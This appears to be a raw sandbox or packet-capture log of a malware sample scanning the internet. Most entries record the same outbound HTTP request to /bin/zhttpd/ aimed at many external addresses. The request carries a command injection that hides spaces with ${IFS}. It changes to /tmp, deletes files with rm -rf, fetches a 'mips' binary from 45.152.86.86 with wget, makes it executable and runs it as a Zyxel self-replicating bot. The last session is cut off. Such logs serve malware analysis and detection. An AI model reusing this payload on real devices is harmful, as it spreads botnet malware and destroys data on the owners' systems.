                              Session IDSource IPSource PortDestination IPDestination Port
                              5411192.168.2.1360616123.185.9.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.954504013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5412192.168.2.1337372151.118.28.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.954569101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5413192.168.2.1339188183.110.91.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.954607010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5414192.168.2.13337589.36.179.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.954649925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5415192.168.2.1343868203.220.73.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.954737902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5416192.168.2.1350554181.243.236.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.954801083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5417192.168.2.1349482128.233.115.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.954853058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5418192.168.2.134240441.105.19.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.954915047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5419192.168.2.1357174131.125.219.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.954972029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5420192.168.2.133506214.111.135.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955017090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5421192.168.2.1351892125.178.206.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955041885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5422192.168.2.1355822223.222.191.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955091953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5423192.168.2.1355900200.27.165.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955147028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5424192.168.2.1348630182.159.227.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955194950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5425192.168.2.1332952168.139.180.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955225945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5426192.168.2.133917412.174.18.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955269098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5427192.168.2.135613289.237.30.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955313921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5428192.168.2.134473674.181.45.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955347061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5429192.168.2.1334356119.251.32.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955408096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5430192.168.2.1356954223.153.0.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955425978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5431192.168.2.1345080132.199.168.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955473900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5432192.168.2.135855850.85.239.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955512047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5433192.168.2.1356082171.10.242.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955542088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5434192.168.2.133538691.220.190.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955605984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5435192.168.2.1358304120.37.159.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955630064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5436192.168.2.133763219.60.47.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955682993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5437192.168.2.133541490.58.254.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955727100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5438192.168.2.1335194107.9.88.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955768108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5439192.168.2.1344618167.206.30.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955816031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5440192.168.2.1341004183.7.117.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955821991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5441192.168.2.134270038.145.156.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955859900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5442192.168.2.1338396104.70.188.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955910921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5443192.168.2.1353526177.236.6.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.955964088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5444192.168.2.1343010182.141.156.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956010103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5445192.168.2.1351192204.213.64.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956053972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5446192.168.2.1351974135.193.7.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956085920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5447192.168.2.134766880.241.125.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956121922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5448192.168.2.1356242161.152.20.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956171036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5449192.168.2.133310446.153.131.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956209898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5450192.168.2.134820093.70.147.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956248999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5451192.168.2.1351938212.204.216.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956300020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5452192.168.2.135376871.101.169.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956334114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5453192.168.2.1354252134.72.194.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956386089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5454192.168.2.135295684.155.23.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956417084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5455192.168.2.1357508142.98.67.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956451893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5456192.168.2.135747438.177.29.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956481934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5457192.168.2.134008019.12.225.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956536055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5458192.168.2.1335116168.46.235.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956567049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5459192.168.2.1350908206.232.61.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956620932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5460192.168.2.135666220.235.17.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956672907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5461192.168.2.135394484.14.124.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956703901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5462192.168.2.135541858.118.225.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956727982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5463192.168.2.1350334170.230.119.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956767082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5464192.168.2.1344990155.171.122.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956799030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5465192.168.2.135001676.74.19.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956864119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5466192.168.2.135926494.186.83.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956886053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5467192.168.2.1359554110.56.48.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.956948996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5468192.168.2.1358504117.233.145.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957006931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5469192.168.2.1352470190.254.167.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957061052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5470192.168.2.133607691.120.9.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957108021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5471192.168.2.135701647.105.58.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957156897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5472192.168.2.1338610132.51.160.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957195044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5473192.168.2.133943646.223.152.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957226038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5474192.168.2.134554469.191.159.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957247019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5475192.168.2.1353666202.16.128.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957283020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5476192.168.2.1340232183.127.113.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957340956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5477192.168.2.1336420135.161.52.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957365990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5478192.168.2.1349044180.72.211.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957410097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5479192.168.2.1344868216.134.75.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.957447052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5480192.168.2.1351304208.126.204.243443
                              TimestampBytes transferredDirectionData
